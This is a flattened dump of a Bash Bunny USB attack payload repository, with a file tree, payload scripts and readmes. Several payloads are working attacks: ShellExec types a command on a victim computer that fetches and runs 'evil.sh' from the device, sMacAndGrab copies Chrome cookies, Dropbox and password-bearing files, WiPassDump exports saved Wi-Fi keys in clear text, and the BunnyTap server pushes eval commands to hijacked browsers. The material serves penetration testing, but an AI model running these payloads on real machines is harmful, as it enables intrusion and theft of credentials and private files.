├── payload.txt │ └── readme.md ├── GitBunnyGit │ ├── README.md │ └── payload.txt ├── MacReverseShell │ ├── payload.txt │ └── readme.md ├── QuickCreds │ ├── payload.txt │ └── readme.md ├── RAZ_ReverseShell │ ├── listener_ip.txt │ ├── listener_port.txt │ └── payload.txt ├── RAZ_VBScript │ ├── a.vbs │ ├── listener_ip.txt │ ├── listener_port.txt │ └── payload.txt ├── ShellExec │ ├── evil.sh │ ├── hook.js │ ├── index.html │ ├── payload.txt │ └── readme.md ├── SmacAndGrab │ ├── payload.txt │ └── readme.md ├── WiPassDump │ ├── a.cmd │ ├── payload.txt │ └── readme.md ├── bunny_helpers.sh ├── faster_smb_exfiltrator │ ├── payload.txt │ ├── readme.md │ └── s.ps1 ├── fireytv │ ├── payload.txt │ └── readme.md ├── macinfograbber │ ├── payload.txt │ └── readme.md ├── nmapper │ ├── payload.txt │ └── readme.md ├── payloads.txt ├── rdp_checker │ ├── install.sh │ ├── payload.txt │ └── readme.md ├── smb_exfiltrator │ ├── payload.txt │ └── readme.md ├── tools_installer │ ├── install.sh │ ├── payload.txt │ ├── readme.txt │ └── tools_to_install │ │ ├── impacket │ │ ├── .gitignore │ │ ├── ChangeLog │ │ ├── LICENSE │ │ ├── MANIFEST.in │ │ ├── README.md │ │ ├── examples │ │ │ ├── GetADUsers.py │ │ │ ├── GetUserSPNs.py │ │ │ ├── atexec.py │ │ │ ├── esentutl.py │ │ │ ├── getPac.py │ │ │ ├── goldenPac.py │ │ │ ├── ifmap.py │ │ │ ├── karmaSMB.py │ │ │ ├── lookupsid.py │ │ │ ├── loopchain.py │ │ │ ├── mmcexec.py │ │ │ ├── mqtt_check.py │ │ │ ├── mssqlclient.py │ │ │ ├── mssqlinstance.py │ │ │ ├── netview.py │ │ │ ├── nmapAnswerMachine.py │ │ │ ├── ntfs-read.py │ │ │ ├── ntlmrelayx.py │ │ │ ├── opdump.py │ │ │ ├── os_ident.py │ │ │ ├── ping.py │ │ │ ├── ping6.py │ │ │ ├── psexec.py │ │ │ ├── raiseChild.py │ │ │ ├── rdp_check.py │ │ │ ├── reg.py │ │ │ ├── registry-read.py │ │ │ ├── rpcdump.py │ │ │ ├── samrdump.py │ │ │ ├── secretsdump.py │ │ │ ├── services.py │ │ │ ├── smbclient.py │ │ │ ├── smbexec.py │ │ │ ├── smbrelayx.py │ │ │ ├── smbserver.py │ │ │ ├── smbtorture.py │ │ │ ├── sniff.py │ │ │ ├── sniffer.py │ │ │ ├── split.py │ │ │ ├── ticketer.py │ │ │ ├── tracer.py │ │ │ ├── uncrc32.py │ │ │ ├── wmiexec.py │ │ │ ├── wmipersist.py │ │ │ └── wmiquery.py │ │ ├── impacket │ │ │ ├── Dot11Crypto.py │ │ │ ├── Dot11KeyManager.py │ │ │ ├── ICMP6.py │ │ │ ├── IP6.py │ │ │ ├── IP6_Address.py │ │ │ ├── IP6_Extension_Headers.py │ │ │ ├── ImpactDecoder.py │ │ │ ├── ImpactPacket.py │ │ │ ├── NDP.py │ │ │ ├── __init__.py │ │ │ ├── cdp.py │ │ │ ├── crypto.py │ │ │ ├── dcerpc │ │ │ │ ├── __init__.py │ │ │ │ └── v5 │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── atsvc.py │ │ │ │ │ ├── dcom │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── comev.py │ │ │ │ │ ├── oaut.py │ │ │ │ │ ├── scmp.py │ │ │ │ │ ├── vds.py │ │ │ │ │ └── wmi.py │ │ │ │ │ ├── dcomrt.py │ │ │ │ │ ├── drsuapi.py │ │ │ │ │ ├── dtypes.py │ │ │ │ │ ├── enum.py │ │ │ │ │ ├── epm.py │ │ │ │ │ ├── lsad.py │ │ │ │ │ ├── lsat.py │ │ │ │ │ ├── mgmt.py │ │ │ │ │ ├── ndr.py │ │ │ │ │ ├── nrpc.py │ │ │ │ │ ├── rpcrt.py │ │ │ │ │ ├── rrp.py │ │ │ │ │ ├── samr.py │ │ │ │ │ ├── sasec.py │ │ │ │ │ ├── scmr.py │ │ │ │ │ ├── srvs.py │ │ │ │ │ ├── transport.py │ │ │ │ │ ├── tsch.py │ │ │ │ │ └── wkst.py │ │ │ ├── dhcp.py │ │ │ ├── dns.py │ │ │ ├── dot11.py │ │ │ ├── eap.py │ │ │ ├── ese.py │ │ │ ├── examples │ │ │ │ ├── __init__.py │ │ │ │ ├── logger.py │ │ │ │ ├── ntlmrelayx │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── clients │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── httprelayclient.py │ │ │ │ │ │ ├── imaprelayclient.py │ │ │ │ │ │ ├── ldaprelayclient.py │ │ │ │ │ │ ├── mssqlrelayclient.py │ │ │ │ │ │ └── smbrelayclient.py │ │ │ │ │ ├── servers │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── httprelayserver.py │ │ │ │ │ │ └── smbrelayserver.py │ │ │ │ │ └── utils │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── config.py │ │ │ │ │ │ ├── targetsutils.py │ │ │ │ │ │ └── tcpshell.py │ │ │ │ ├── remcomsvc.py │ │ │ │ ├── secretsdump.py │ │ │ │ └── serviceinstall.py │ │ │ ├── helper.py │ │ │ ├── hresult_errors.py │ │ │ ├── krb5 │ │ │ │ ├── __init__.py │ │ │ │ ├── asn1.py │ │ │ │ ├── ccache.py │ │ │ │ ├── constants.py │ │ │ │ ├── crypto.py │ │ │ │ ├── gssapi.py │ │ │ │ ├── kerberosv5.py │ │ │ │ ├── pac.py │ │ │ │ └── types.py │ │ │ ├── ldap │ │ │ │ ├── __init__.py │ │ │ │ ├── ldap.py │ │ │ │ └── ldapasn1.py │ │ │ ├── mqtt.py │ │ │ ├── nmb.py │ │ │ ├── nt_errors.py │ │ │ ├── ntlm.py │ │ │ ├── pcap_linktypes.py │ │ │ ├── pcapfile.py │ │ │ ├── smb.py │ │ │ ├── smb3.py │ │ │ ├── smb3structs.py │ │ │ ├── smbconnection.py │ │ │ ├── smbserver.py │ │ │ ├── spnego.py │ │ │ ├── structure.py │ │ │ ├── system_errors.py │ │ │ ├── tds.py │ │ │ ├── testcases │ │ │ │ ├── ImpactPacket │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── runalltestcases.bat │ │ │ │ │ ├── runalltestcases.sh │ │ │ │ │ ├── test_ICMP6.py │ │ │ │ │ ├── test_IP6.py │ │ │ │ │ ├── test_IP6_Address.py │ │ │ │ │ ├── test_IP6_Extension_Headers.py │ │ │ │ │ ├── test_TCP.py │ │ │ │ │ ├── test_TCP_bug_issue7.py │ │ │ │ │ └── test_ethernet.py │ │ │ │ ├── SMB_RPC │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── dcetests.cfg │ │ │ │ │ ├── rundce.sh │ │ │ │ │ ├── test_dcomrt.py │ │ │ │ │ ├── test_drsuapi.py │ │ │ │ │ ├── test_epm.py │ │ │ │ │ ├── test_ldap.py │ │ │ │ │ ├── test_lsad.py │ │ │ │ │ ├── test_lsat.py │ │ │ │ │ ├── test_mgmt.py │ │ │ │ │ ├── test_ndr.py │ │ │ │ │ ├── test_nmb.py │ │ │ │ │ ├── test_nrpc.py │ │ │ │ │ ├── test_ntlm.py │ │ │ │ │ ├── test_rpcrt.py │ │ │ │ │ ├── test_rrp.py │ │ │ │ │ ├── test_samr.py │ │ │ │ │ ├── test_scmr.py │ │ │ │ │ ├── test_smb.py │ │ │ │ │ ├── test_spnego.py │ │ │ │ │ ├── test_srvs.py │ │ │ │ │ ├── test_tsch.py │ │ │ │ │ ├── test_wkst.py │ │ │ │ │ └── test_wmi.py │ │ │ │ ├── __init__.py │ │ │ │ └── dot11 │ │ │ │ │ ├── runalltestcases.bat │ │ │ │ │ ├── runalltestcases.sh │ │ │ │ │ ├── test_Dot11Base.py │ │ │ │ │ ├── test_Dot11Decoder.py │ │ │ │ │ ├── test_Dot11HierarchicalUpdate.py │ │ │ │ │ ├── test_FrameControlACK.py │ │ │ │ │ ├── test_FrameControlCFEnd.py │ │ │ │ │ ├── test_FrameControlCFEndCFACK.py │ │ │ │ │ ├── test_FrameControlCTS.py │ │ │ │ │ ├── test_FrameControlPSPoll.py │ │ │ │ │ ├── test_FrameControlRTS.py │ │ │ │ │ ├── test_FrameData.py │ │ │ │ │ ├── test_FrameManagement.py │ │ │ │ │ ├── test_FrameManagementAssociationRequest.py │ │ │ │ │ ├── test_FrameManagementAssociationResponse.py │ │ │ │ │ ├── test_FrameManagementAuthentication.py │ │ │ │ │ ├── test_FrameManagementDeauthentication.py │ │ │ │ │ ├── test_FrameManagementDisassociation.py │ │ │ │ │ ├── test_FrameManagementProbeRequest.py │ │ │ │ │ ├── test_FrameManagementProbeResponse.py │ │ │ │ │ ├── test_FrameManagementReassociationRequest.py │ │ │ │ │ ├── test_FrameManagementReassociationResponse.py │ │ │ │ │ ├── test_RadioTap.py │ │ │ │ │ ├── test_RadioTapDecoder.py │ │ │ │ │ ├── test_WEPDecoder.py │ │ │ │ │ ├── test_WEPEncoder.py │ │ │ │ │ ├── test_WPA.py │ │ │ │ │ ├── test_WPA2.py │ │ │ │ │ ├── test_helper.py │ │ │ │ │ └── test_wps.py │ │ │ ├── uuid.py │ │ │ ├── version.py │ │ │ ├── winregistry.py │ │ │ └── wps.py │ │ └── setup.py │ │ └── responder │ │ ├── .gitignore │ │ ├── DumpHash.py │ │ ├── LICENSE │ │ ├── README.md │ │ ├── Report.py │ │ ├── Responder.conf │ │ ├── Responder.py │ │ ├── certs │ │ ├── gen-self-signed-cert.sh │ │ ├── responder.crt │ │ └── responder.key │ │ ├── files │ │ ├── AccessDenied.html │ │ └── BindShell.exe │ │ ├── fingerprint.py │ │ ├── logs │ │ └── .gitignore │ │ ├── odict.py │ │ ├── packets.py │ │ ├── poisoners │ │ ├── LLMNR.py │ │ ├── MDNS.py │ │ ├── NBTNS.py │ │ └── __init__.py │ │ ├── servers │ │ ├── Browser.py │ │ ├── DNS.py │ │ ├── FTP.py │ │ ├── HTTP.py │ │ ├── HTTP_Proxy.py │ │ ├── IMAP.py │ │ ├── Kerberos.py │ │ ├── LDAP.py │ │ ├── MSSQL.py │ │ ├── POP3.py │ │ ├── Proxy_Auth.py │ │ ├── SMB.py │ │ ├── SMTP.py │ │ └── __init__.py │ │ ├── settings.py │ │ ├── tools │ │ ├── BrowserListener.py │ │ ├── DHCP.py │ │ ├── DHCP_Auto.sh │ │ ├── FindSMB2UPTime.py │ │ ├── FindSQLSrv.py │ │ ├── Icmp-Redirect.py │ │ ├── MultiRelay.py │ │ ├── MultiRelay │ │ │ ├── RelayMultiCore.py │ │ │ ├── RelayMultiPackets.py │ │ │ ├── __init__.py │ │ │ ├── creddump │ │ │ │ ├── CHANGELOG │ │ │ │ ├── COPYING │ │ │ │ ├── README │ │ │ │ ├── cachedump.py │ │ │ │ ├── framework │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── addrspace.py │ │ │ │ │ ├── newobj.py │ │ │ │ │ ├── object.py │ │ │ │ │ ├── types.py │ │ │ │ │ └── win32 │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── domcachedump.py │ │ │ │ │ │ ├── hashdump.py │ │ │ │ │ │ ├── lsasecrets.py │ │ │ │ │ │ └── rawreg.py │ │ │ │ ├── lsadump.py │ │ │ │ └── pwdump.py │ │ │ └── relay-dumps │ │ │ │ └── .gitignore │ │ ├── RunFinger.py │ │ ├── SMBFinger │ │ │ ├── Finger.py │ │ │ ├── __init__.py │ │ │ └── odict.py │ │ └── odict.py │ │ └── utils.py └── usb_exfiltrator │ ├── d.cmd │ ├── e.cmd │ ├── i.vbs │ ├── payload.txt │ └── readme.md ├── switch1 └── payload.txt └── switch2 └── payload.txt /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.project 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Payload Library for the Bash Bunny by Hak5 2 | 3 | ![Bash Bunny](https://cdn.shopify.com/s/files/1/0068/2142/products/bashbunny_2a_large.png "Bash Bunny") 4 | 5 | * [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com") 6 | * [Documentation and Wiki](http://wiki.bashbunny.com/#!index.md "Documentation and Wiki") 7 | * [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums") 8 | * IRC: irc.hak5.org #BashBunny 9 | -------------------------------------------------------------------------------- /payloads/library/90sMode/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: 90s Mode 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # Category: Prank 7 | # Target: Windows XP SP3+ 8 | # 9 | # Turns back the clock to a k-rad ultra ereet 1990's VGA resolution 10 | # Executes p.ps1 from the selected switch folder of the Bash Bunny USB Disk partition, 11 | 12 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 13 | source bunny_helpers.sh 14 | 15 | LED R B 16 | ATTACKMODE HID STORAGE 17 | QUACK GUI r 18 | QUACK DELAY 100 19 | QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\r.ps1')" 20 | QUACK ENTER 21 | LED G -------------------------------------------------------------------------------- /payloads/library/90sMode/readme.md: -------------------------------------------------------------------------------- 1 | # 90s Mode for Bash Bunnys 2 | 3 | * Author: Hak5Darren 4 | * Version: Version 1.0 5 | * Category: Prank 6 | * Target: Windows XP SP3+ / Powershell 7 | 8 | 9 | ## Description 10 | 11 | Turns back the clock to a k-rad ultra ereet 1990's VGA resolution 12 | Executes p.ps1 from the selected switch folder of the Bash Bunny USB Disk partition. 13 | 14 | ## Unnecessary Background Story 15 | 16 | Once a family member asked me to troubleshoot their computer. They claimed their hard drive was filling up. I checked and they had barely used the enormous (at the time) 20 GB HDD. Sorry I said, everything looks good. No they exclaimed, loading all of these cool programs from the World Wide Web was fine, but there's barely any room for another icon! 17 | 18 | Oh. Yes. About that... So I did what any good geek would and increased their resolution from 800x600 to 1024x768. Voila! More desktop real estate! 19 | 20 | Great! But now I need my reading glasses! 21 | 22 | So, one could say this payload *decreases* the disk space of the victim computer ;-) 23 | 24 | ## Configuration 25 | 26 | By default the payload switches to the very cool 640x480 resoluiton, however this can be configured to other standards such as 800x600 or 1024x768 in the last line of r.ps1 (this should eventually become a config line in payload.txt) 27 | 28 | ## STATUS 29 | 30 | | LED | Status | 31 | | ------------------ | -------------------------------------------- | 32 | | Purple | Attack Setup | 33 | | Green | Attack Complete | 34 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/README.md: -------------------------------------------------------------------------------- 1 | # BunnyTap for Bash Bunnys 2 | 3 | Author: Whistle Master 4 | Version: Version 1.0 5 | Credit: @SamyKamkar 6 | 7 | ## Description 8 | 9 | Based on PoisonTap created by @SamyKamkar || https://samy.pl 10 | 11 | ## Configuration 12 | 13 | Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix 14 | 15 | ## Requirements 16 | 17 | dnsspoof must be installed (use install.sh) 18 | 19 | ## Install LED STATUS 20 | 21 | | LED | Status | 22 | | ---------------- | -------------------------------------- | 23 | | White (blinking) | Dependencies not met | 24 | | Purple | Setup | 25 | | Purple (blinking)| Installing dependencies | 26 | | White (blinking) | Finished installing | 27 | | Red (blinking) | Install failed, no Internet connection | 28 | 29 | ## Payload LED STATUS 30 | 31 | | LED | Status | 32 | | ---------------- | -------------------------------------- | 33 | | Green (blinking) | BunnyTap Setup | 34 | | Blue | BunnyTap running | 35 | 36 | ## Discussion 37 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40240-poisontap-on-the-bunny/ "Hak5 Forum Thread") 38 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/alexa1m.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | wget http://s3.amazonaws.com/alexa-static/top-1m.csv.zip -------------------------------------------------------------------------------- /payloads/library/BunnyTap/backend_server.js: -------------------------------------------------------------------------------- 1 | // PoisonTap by Samy Kamkar - https://samy.pl/poisontap 2 | 3 | //var _ = require('underscore') 4 | var WebSocketServer = require('websocket').server 5 | var webSocketsServerPort = 1337 6 | var http = require('http') 7 | var conns = [] 8 | var gr 9 | var server = http.createServer((request, response) => { 10 | console.log((new Date()) + ' HTTP server. URL ' + request.url + ' requested.') 11 | 12 | if (request.url.indexOf('/exec?') === 0) 13 | { 14 | response.writeHead(404, {'Content-Type': 'text/html'}) 15 | for (var i in conns) 16 | conns[i].sendUTF(JSON.stringify({ request: 'eval', content: request.url.substr(6) })) 17 | response.end("sent") 18 | } 19 | else if (request.url.indexOf('/send?') === 0) 20 | { 21 | response.writeHead(404, {'Content-Type': 'text/html'}) 22 | for (var i in conns) 23 | conns[i].sendUTF('{"' + decodeURI(request.url.substr(6)).replace(/"/g, '\\"').replace(/&/g, '","').replace(/=/g,'":"') + '"}') 24 | var checkgr = () => 25 | { 26 | if (gr) 27 | { 28 | response.end(gr) 29 | gr = "" 30 | } 31 | else 32 | setTimeout(checkgr, 500) 33 | } 34 | checkgr() 35 | } 36 | else if (request.url === '/status') 37 | { 38 | response.writeHead(200, {'Content-Type': 'application/json'}) 39 | var responseObject = { 40 | currentClients: 1234, 41 | totalHistory: 567 42 | } 43 | response.end(JSON.stringify(responseObject)) 44 | } 45 | else { 46 | response.writeHead(404, {'Content-Type': 'text/html'}) 47 | response.end('Sorry, unknown url') 48 | } 49 | }) 50 | server.listen(webSocketsServerPort, () => { 51 | console.log((new Date()) + " Server is listening on port " + webSocketsServerPort) 52 | }) 53 | 54 | // create the server 55 | wsServer = new WebSocketServer({ 56 | httpServer: server 57 | }) 58 | 59 | function handleReq(obj, con) 60 | { 61 | if (obj.request === 'getresponse') 62 | gr = obj.html 63 | } 64 | 65 | wsServer.on('request', (request) => { 66 | var obj 67 | var connection = request.accept(null, request.origin) 68 | conns.push(connection) 69 | 70 | connection.on('request', (message) => { 71 | console.log('request: ' + message) 72 | }) 73 | 74 | connection.on('message', (message) => { 75 | try { obj = JSON.parse(message.utf8Data) } catch(e) { } 76 | console.log('message: ' + message.utf8Data) 77 | console.log(obj) 78 | 79 | if (typeof(obj) === 'object') 80 | handleReq(obj, connection) 81 | else 82 | connection.sendUTF('hello') 83 | }) 84 | 85 | // remove connection from our list 86 | connection.on('close', connection => { 87 | console.log('connection closed') 88 | for (var i in conns) 89 | if (conns[i] == connection) 90 | //if (_.isEqual(conns[i], connection)) // XXX 91 | conn.splice(i, 1) 92 | }) 93 | }) 94 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/install.sh: -------------------------------------------------------------------------------- 1 | # Installs dependencies for BunnyTap payload 2 | # Requires Internet connection 3 | # See documentation for Internet Connection Sharing details 4 | # 5 | # LED STATUS 6 | # purple..............setup 7 | # purple (blinking)...installing dependencies 8 | # white (blinking)....finished installing 9 | # red (blinking)......install failed, no Internet connection 10 | 11 | 12 | # Setup Ethernet (Switch RNDIS to ECM if Mac/Linux) 13 | LED R B 14 | ATTACKMODE RNDIS_ETHERNET 15 | # ATTACKMODE ECM_ETHERNET 16 | 17 | # Check if connected to the Internet 18 | wget -q --tries=5 --timeout=15 --spider http://example.com 19 | if [[ $? -eq 0 ]]; then 20 | # Online 21 | LED R B 100 22 | apt-get -y install dsniff 23 | LED R G B 50 24 | sleep 2 25 | exit 0 26 | else 27 | # Offline 28 | LED R 100 29 | exit 1 30 | fi -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta6__angular.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__jquery__2.1.2__jquery.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.1.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.1.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.3__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.4__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.5__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.3__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.4__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.5__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.5.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.5.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__scriptaculous__1.8.1__scriptaculous.js: -------------------------------------------------------------------------------- 1 | // script.aculo.us scriptaculous.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008 2 | 3 | // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) 4 | // 5 | // Permission is hereby granted, free of charge, to any person obtaining 6 | // a copy of this software and associated documentation files (the 7 | // "Software"), to deal in the Software without restriction, including 8 | // without limitation the rights to use, copy, modify, merge, publish, 9 | // distribute, sublicense, and/or sell copies of the Software, and to 10 | // permit persons to whom the Software is furnished to do so, subject to 11 | // the following conditions: 12 | // 13 | // The above copyright notice and this permission notice shall be 14 | // included in all copies or substantial portions of the Software. 15 | // 16 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 17 | // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 19 | // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 20 | // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 21 | // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 22 | // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 23 | // 24 | // For details, see the script.aculo.us web site: http://script.aculo.us/ 25 | 26 | var Scriptaculous = { 27 | Version: '1.8.1', 28 | require: function(libraryName) { 29 | // inserting via DOM fails in Safari 2.0, so brute force approach 30 | document.write(' 4 | 5 | 6 | 7 | Nothing to see here! 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /payloads/library/ShellExec/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Title: ShellExec 4 | # Author: audibleblink 5 | # Target: Mac/Linux 6 | # Version: 1.0 7 | # 8 | # Create a web server on the BashBunny and forces 9 | # the victim download and execute a script. 10 | # 11 | # White | Ready 12 | # Ammber blinking | Waiting for server 13 | # Blue blinking | Attacking 14 | # Green | Finished 15 | 16 | LED R G B 17 | ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E 18 | 19 | source bunny_helpers.sh 20 | 21 | payload_dir=/root/udisk/payloads/$SWITCH_POSITION 22 | log_file=$payload_dir/shellexec.log 23 | 24 | cd $payload_dir 25 | 26 | # starting server 27 | LED R G 500 28 | 29 | # disallow outgoing dns requests so server starts immediately 30 | iptables -A OUTPUT -p udp --dport 53 -j DROP 31 | python -m SimpleHTTPServer 80 32 | 33 | # wait until port is listening 34 | while ! nc -z localhost 80; do sleep 0.2; done 35 | 36 | # attack commences 37 | LED B 500 38 | 39 | Q GUI SPACE 40 | Q DELAY 300 41 | Q STRING terminal 42 | Q DELAY 100 43 | Q ENTER 44 | Q DELAY 2000 45 | 46 | # Q ALT F2 # swap with block above for linux 47 | # Q DELAY 100 48 | 49 | Q STRING curl "http://$HOST_IP/evil.sh" \| sh 50 | # in case curl isn't installed 51 | # Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh 52 | Q ENTER 53 | 54 | LED G 55 | -------------------------------------------------------------------------------- /payloads/library/ShellExec/readme.md: -------------------------------------------------------------------------------- 1 | # ShellExec 2 | 3 | Author: audibleblink 4 | Version: 1.0 5 | 6 | ## Description 7 | 8 | Serves malicious scripts or web pages from the Bunny and forces 9 | victims to curl and execute those scripts. Scripts can also force 10 | browsers to open a url on the bunny to do things like serve BeEF 11 | hooks. 12 | 13 | ## Configuration 14 | 15 | evil.py - script that is fetched with DuckyScript 16 | (provided script opens a web page that serves a BeEF hook ) 17 | 18 | hook.js - the aforementioned BeEF hook 19 | 20 | index.html - BeEF hook delivery page 21 | 22 | ## Requirements 23 | 24 | Just plug and play 25 | 26 | ## Status 27 | 28 | | LED | Status | 29 | | --------- | ----------- | 30 | | White | Ready | 31 | | Amber blinking | Waiting for server | 32 | | Blue blinking | Attacking | 33 | | Green | Finished | 34 | 35 | -------------------------------------------------------------------------------- /payloads/library/SmacAndGrab/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: sMacAndGrab 4 | # Author: audibleblink 5 | # Target: macOS 6 | # Version: 1.1 7 | # 8 | # Backup a list of files from macOS 9 | # 10 | # Yellow (blinking)...Attacking 11 | # Green...............Finished 12 | 13 | LED G R 500 14 | ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E 15 | 16 | # make the loot directory on the BashBunny 17 | mkdir -p /root/udisk/loot/sMacAndGrab 18 | 19 | # mounted device name 20 | dev_name="BashBunny" 21 | 22 | # loot directory when mounted on the mac 23 | lootdir="/Volumes/$dev_name/loot/sMacAndGrab" 24 | 25 | # Add files, folders, or commands that return filenames 26 | files_to_copy=( 27 | "\"~/Library/Application Support/Google/Chrome/Default/Cookies\"" # Quote paths with spaces 28 | "~/Dropbox" 29 | "\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET 30 | ) 31 | 32 | QUACK GUI SPACE 33 | QUACK DELAY 1000 34 | QUACK STRING terminal 35 | QUACK ENTER 36 | QUACK DELAY 4000 37 | # the more files in $files to copy, the longer tar will take to compress 38 | # one-liner because we want the move command to wait for tar to finish 39 | QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal 40 | QUACK ENTER 41 | 42 | # sync the filesystem 43 | sync 44 | LED G 45 | 46 | -------------------------------------------------------------------------------- /payloads/library/SmacAndGrab/readme.md: -------------------------------------------------------------------------------- 1 | # sMacAndGrab 2 | 3 | Author: audibleblink 4 | Version: Version 1.1 5 | Target: macOS 6 | 7 | ## Description 8 | 9 | Mounts as storage and acts as HID. Backup a list of files to the BashBunny 10 | 11 | ## Configuration 12 | 13 | Provide a newline-separated list of files you want to backup and wait for the green light. 14 | You can also provide `find` and `grep` commands as literal strings to pass to QUACK which get run on TARGET. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ---------------- | ------------------------------------- | 20 | | Amber (blinking) | Attacking | 21 | | Green | Finished | 22 | 23 | -------------------------------------------------------------------------------- /payloads/library/WiPassDump/a.cmd: -------------------------------------------------------------------------------- 1 | REM Go to dump directory 2 | cd /d %~dp0 3 | cd ../../loot/WiPassDump/ 4 | 5 | REM Dump saved Wi-Fi infos 6 | netsh wlan export profile key=clear -------------------------------------------------------------------------------- /payloads/library/WiPassDump/payload.txt: 